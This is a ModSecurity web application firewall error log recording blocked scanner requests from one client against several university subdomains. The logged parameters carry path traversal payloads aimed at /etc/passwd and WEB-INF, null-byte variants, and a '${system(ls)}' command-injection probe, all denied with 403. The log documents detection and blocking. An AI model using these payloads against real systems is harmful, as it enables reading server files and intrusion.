[Tue Aug 29 11:42:10.440533 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IsCo-f0AAAc-5zcAAAAN"]
[Tue Aug 29 11:42:11.378255 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAdUczcAAAAZ"]
[Tue Aug 29 11:42:11.378256 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAddJqQAAAAh"]
[Tue Aug 29 11:42:11.384724 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAdftQEAAAAG"]
[Tue Aug 29 11:42:11.385011 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAcsLFgAAAAE"]
[Tue Aug 29 11:42:11.390047 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAc@cWoAAAAL"]
[Tue Aug 29 11:42:11.403030 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAdb7h8AAAAb"]
[Tue Aug 29 11:42:11.404225 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAc-5zkAAAAN"]
[Tue Aug 29 11:42:11.405717 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAdSZKYAAAAX"]
[Tue Aug 29 11:42:11.431495 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAcsLFkAAAAE"]
[Tue Aug 29 11:42:11.431668 2023] [:error] [pid 1888] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAdgyCgAAAAj"]
[Tue Aug 29 11:42:11.467974 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAdSZKcAAAAX"]
[Tue Aug 29 11:42:12.395192 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JMCo-f0AAAddJqcAAAAh"]
[Tue Aug 29 11:42:12.401714 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAdV7ZkAAAAa"]
[Tue Aug 29 11:42:12.424256 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAdhHyQAAAAB"]
[Tue Aug 29 11:42:12.424649 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAdaZN8AAAAM"]
[Tue Aug 29 11:42:12.424727 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAdUczsAAAAZ"]
[Tue Aug 29 11:42:12.427639 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAdTA-AAAAAY"]
[Tue Aug 29 11:42:13.385628 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JcCo-f0AAAdKXNYAAAAK"]
[Tue Aug 29 11:42:13.390087 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JcCo-f0AAAbo-a8AAAAi"]
[Tue Aug 29 11:42:14.355253 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAddJqsAAAAh"]
[Tue Aug 29 11:42:14.355957 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAdQ3fEAAAAV"]
[Tue Aug 29 11:42:14.357527 2023] [:error] [pid 1891] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAdjucQAAAAl"]
[Tue Aug 29 11:42:14.359872 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAdTA-IAAAAY"]
[Tue Aug 29 11:42:14.361181 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAdV7Z0AAAAa"]
[Tue Aug 29 11:42:14.381925 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAdZZpkAAAAf"]
[Tue Aug 29 11:42:14.407780 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAcvBjYAAAAJ"]
[Tue Aug 29 11:42:14.417431 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAdTA-MAAAAY"]
[Tue Aug 29 11:42:14.419772 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAdKXNkAAAAK"]
[Tue Aug 29 11:42:14.419828 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAdPLyUAAAAT"]
[Tue Aug 29 11:42:14.424829 2023] [:error] [pid 1888] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAdgyC0AAAAj"]
[Tue Aug 29 11:42:14.425615 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAc360AAAAAO"]
[Tue Aug 29 11:42:14.432476 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAdQ3fIAAAAV"]
[Tue Aug 29 11:42:14.433318 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAcsLF4AAAAE"]
[Tue Aug 29 11:42:14.468197 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAdOeP4AAAAS"]
[Tue Aug 29 11:42:15.393338 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:cat_id: ${system(ls)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO13J8Co-f0AAAdV7Z8AAAAa"]
[Tue Aug 29 11:42:15.425378 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13J8Co-f0AAAcoNhkAAAAF"]
[Tue Aug 29 11:42:15.434847 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:cat_id: ${system(ls)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO13J8Co-f0AAAdeQ0AAAAAQ"]
[Tue Aug 29 11:42:15.450187 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13J8Co-f0AAAcsLGAAAAAE"]
[Tue Aug 29 11:42:17.389909 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAdTA-cAAAAY"]
[Tue Aug 29 11:42:17.394113 2023] [:error] [pid 1892] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAdkUQIAAAAm"]
